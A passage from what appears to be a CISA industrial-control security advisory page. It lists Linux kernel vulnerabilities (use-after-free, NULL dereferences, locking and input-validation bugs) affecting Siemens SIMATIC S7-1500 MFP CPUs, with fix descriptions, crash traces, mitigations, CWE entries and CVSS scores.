handle_mm_fault+0xc4/0x1f0 This is because thousands of processes are in the OOM cgroup, it takes a long time to traverse all of them. As a result, this lead to soft lockup in the OOM process. To fix this issue, call 'cond_resched' in the 'mem_cgroup_scan_tasks' function per 1000 iterations. For global OOM, call 'touch_softlockup_watchdog' per 1000 iterations to avoid this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-57977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/667.html">CWE-667 Improper Locking</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-57979</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pps: Fix a use-after-free On a board running ntpd and gpsd, I'm seeing a consistent use-after-free in sys_exit() from gpsd when rebooting: pps pps1: removed ------------[ cut here ]------------ kobject: '(null)' (00000000db4bec24): is not initialized, yet kobject_put() is being called. WARNING: CPU: 2 PID: 440 at lib/kobject.c:734 kobject_put+0x120/0x150 CPU: 2 UID: 299 PID: 440 Comm: gpsd Not tainted 6.11.0-rc6-00308-gb31c44928842 #1 Hardware name: Raspberry Pi 4 Model B Rev 1.1 (DT) pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : kobject_put+0x120/0x150 lr : kobject_put+0x120/0x150 sp : ffffffc0803d3ae0 x29: ffffffc0803d3ae0 x28: ffffff8042dc9738 x27: 0000000000000001 x26: 0000000000000000 x25: ffffff8042dc9040 x24: ffffff8042dc9440 x23: ffffff80402a4620 x22: ffffff8042ef4bd0 x21: ffffff80405cb600 x20: 000000000008001b x19: ffffff8040b3b6e0 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 696e6920746f6e20 x14: 7369203a29343263 x13: 205d303434542020 x12: 0000000000000000 x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000 x8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000 x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 Call trace: kobject_put+0x120/0x150 cdev_put+0x20/0x3c __fput+0x2c4/0x2d8 ____fput+0x1c/0x38 task_work_run+0x70/0xfc do_exit+0x2a0/0x924 do_group_exit+0x34/0x90 get_signal+0x7fc/0x8c0 do_signal+0x128/0x13b4 do_notify_resume+0xdc/0x160 el0_svc+0xd4/0xf8 el0t_64_sync_handler+0x140/0x14c el0t_64_sync+0x190/0x194 ---[ end trace 0000000000000000 ]--- ...followed by more symptoms of corruption, with similar stacks: refcount_t: underflow; use-after-free. kernel BUG at lib/list_debug.c:62! Kernel panic - not syncing: Oops - BUG: Fatal exception This happens because pps_device_destruct() frees the pps_device with the embedded cdev immediately after calling cdev_del(), but, as the comment above cdev_del() notes, fops for previously opened cdevs are still callable even after cdev_del() returns. I think this bug has always been there: I can't explain why it suddenly started happening every time I reboot this particular board. In commit d953e0e837e6 ("pps: Fix a use-after free bug when unregistering a source."), George Spelvin suggested removing the embedded cdev. That seems like the simplest way to fix this, so I've implemented his suggestion, using __register_chrdev() with pps_idr becoming the source of truth for which minor corresponds to which device. But now that pps_idr defines userspace visibility instead of cdev_add(), we need to be sure the pps-&gt;dev refcount can't reach zero while userspace can still find it again. So, the idr_remove() call moves to pps_unregister_cdev(), and pps_idr now holds a reference to pps-&gt;dev. pps_core: source serial1 got cdev (251:1) &lt;...&gt; pps pps1: removed pps_core: unregistering pps1 pps_core: deallocating pps1</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-57979">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58011</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: platform/x86: int3472: Check for adev == NULL Not all devices have an ACPI companion fwnode, so adev might be NULL. This can e.g. (theoretically) happen when a user manually binds one of the int3472 drivers to another i2c/platform device through sysfs. Add a check for adev not being set and return -ENODEV in that case to avoid a possible NULL pointer deref in skl_int3472_get_acpi_buffer().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58011">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58016</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: safesetid: check size of policy writes syzbot attempts to write a buffer with a large size to a sysfs entry with writes handled by handle_policy_update(), triggering a warning in kmalloc. Check the size specified for write buffers before allocating. [PM: subject tweak]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58016">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58020</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: HID: multitouch: Add NULL check in mt_input_configured devm_kasprintf() can return a NULL pointer on failure,but this returned value in mt_input_configured() is not checked. Add NULL check in mt_input_configured(), to handle kernel NULL pointer dereference error.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58020">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58056</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: remoteproc: core: Fix ida_free call while not allocated In the rproc_alloc() function, on error, put_device(&amp;rproc-&gt;dev) is called, leading to the call of the rproc_type_release() function. An error can occurs before ida_alloc is called. In such case in rproc_type_release(), the condition (rproc-&gt;index &gt;= 0) is true as rproc-&gt;index has been initialized to 0. ida_free() is called reporting a warning: [ 4.181906] WARNING: CPU: 1 PID: 24 at lib/idr.c:525 ida_free+0x100/0x164 [ 4.186378] stm32-display-dsi 5a000000.dsi: Fixed dependency cycle(s) with /soc/dsi@5a000000/panel@0 [ 4.188854] ida_free called for id=0 which is not allocated. [ 4.198256] mipi-dsi 5a000000.dsi.0: Fixed dependency cycle(s) with /soc/dsi@5a000000 [ 4.203556] Modules linked in: panel_orisetech_otm8009a dw_mipi_dsi_stm(+) gpu_sched dw_mipi_dsi stm32_rproc stm32_crc32 stm32_ipcc(+) optee(+) [ 4.224307] CPU: 1 UID: 0 PID: 24 Comm: kworker/u10:0 Not tainted 6.12.0 #442 [ 4.231481] Hardware name: STM32 (Device Tree Support) [ 4.236627] Workqueue: events_unbound deferred_probe_work_func [ 4.242504] Call trace: [ 4.242522] unwind_backtrace from show_stack+0x10/0x14 [ 4.250218] show_stack from dump_stack_lvl+0x50/0x64 [ 4.255274] dump_stack_lvl from __warn+0x80/0x12c [ 4.260134] __warn from warn_slowpath_fmt+0x114/0x188 [ 4.265199] warn_slowpath_fmt from ida_free+0x100/0x164 [ 4.270565] ida_free from rproc_type_release+0x38/0x60 [ 4.275832] rproc_type_release from device_release+0x30/0xa0 [ 4.281601] device_release from kobject_put+0xc4/0x294 [ 4.286762] kobject_put from rproc_alloc.part.0+0x208/0x28c [ 4.292430] rproc_alloc.part.0 from devm_rproc_alloc+0x80/0xc4 [ 4.298393] devm_rproc_alloc from stm32_rproc_probe+0xd0/0x844 [stm32_rproc] [ 4.305575] stm32_rproc_probe [stm32_rproc] from platform_probe+0x5c/0xbc Calling ida_alloc earlier in rproc_alloc ensures that the rproc-&gt;index is properly set.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58056">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58058</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ubifs: skip dumping tnc tree when zroot is null Clearing slab cache will free all znode in memory and make c-&gt;zroot.znode = NULL, then dumping tnc tree will access c-&gt;zroot.znode which cause null pointer dereference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58058">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58061</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: prohibit deactivating all links In the internal API this calls this is a WARN_ON, but that should remain since internally we want to know about bugs that may cause this. Prevent deactivating all links in the debugfs write directly.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58061">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-58086</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Stop active perfmon if it is being destroyed If the active performance monitor (`v3d-&gt;active_perfmon`) is being destroyed, stop it first. Currently, the active perfmon is not stopped during destruction, leaving the `v3d-&gt;active_perfmon` pointer stale. This can lead to undefined behavior and instability. This patch ensures that the active perfmon is stopped before being destroyed, aligning with the behavior introduced in commit 7d1fd3638ee3 ("drm/v3d: Stop the active perfmon before being destroyed").</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-58086">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21645</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd/pmc: Only disable IRQ1 wakeup where i8042 actually enabled it Wakeup for IRQ1 should be disabled only in cases where i8042 had actually enabled it, otherwise "wake_depth" for this IRQ will try to drop below zero and there will be an unpleasant WARN() logged: kernel: atkbd serio0: Disabling IRQ1 wakeup source to avoid platform firmware bug kernel: ------------[ cut here ]------------ kernel: Unbalanced IRQ 1 wake disable kernel: WARNING: CPU: 10 PID: 6431 at kernel/irq/manage.c:920 irq_set_irq_wake+0x147/0x1a0 The PMC driver uses DEFINE_SIMPLE_DEV_PM_OPS() to define its dev_pm_ops which sets amd_pmc_suspend_handler() to the .suspend, .freeze, and .poweroff handlers. i8042_pm_suspend(), however, is only set as the .suspend handler. Fix the issue by call PMC suspend handler only from the same set of dev_pm_ops handlers as i8042_pm_suspend(), which currently means just the .suspend handler. To reproduce this issue try hibernating (S4) the machine after a fresh boot without putting it into s2idle first. [ij: edited the commit message.]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21645">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
